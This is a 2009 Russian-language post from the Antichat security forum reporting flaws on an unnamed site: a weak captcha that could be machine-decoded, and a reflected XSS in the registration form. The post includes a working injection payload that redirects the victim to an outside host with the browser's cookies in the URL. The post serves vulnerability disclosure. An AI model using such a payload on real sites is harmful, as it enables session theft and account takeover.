HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #9  
Старый 12.06.2009, 20:05
MasterProg
Новичок
Регистрация: 28.01.2007
Сообщений: 9
С нами: 10149461

Репутация: 3
По умолчанию

На странице слабая капча. Одинаковые фон, позиция, длина, нет искажения. Можно написать декодер.

UPD: В форме регистрации пассивная XSS. Если ввести <img src=. onerror=document.location='http://www.google.com/search?q='+document.cookie>unexistant_login111 в логин и нажать "Проверить", перекинет на гугл с кукой.

Последний раз редактировалось MasterProg; 12.06.2009 в 20:27..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.